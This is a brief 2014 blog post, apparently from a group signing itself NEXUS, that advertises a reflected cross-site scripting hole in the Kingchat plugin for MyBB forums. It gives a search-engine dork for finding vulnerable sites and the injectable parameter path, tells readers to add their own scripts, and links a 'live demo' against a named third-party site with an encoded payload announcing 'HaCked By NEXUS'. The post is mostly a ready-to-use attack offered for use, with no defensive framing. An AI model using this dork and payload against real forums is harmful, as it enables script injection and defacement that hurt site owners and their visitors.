Saturday, 5 July 2014

MyBB Kingchat - XSS

Dork:
inurl:/kingchat.php?

Exploit:
 /kingchat.php?notic

Change that /... into this to see exploit:
 /kingchat.php?chat=2&l=2

Then add your scripts...

Live Demo:
http://www.embargoedchat.co.uk/kingchat.php?chat=2&l=2%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

 NEXUS - Sharing Is Caring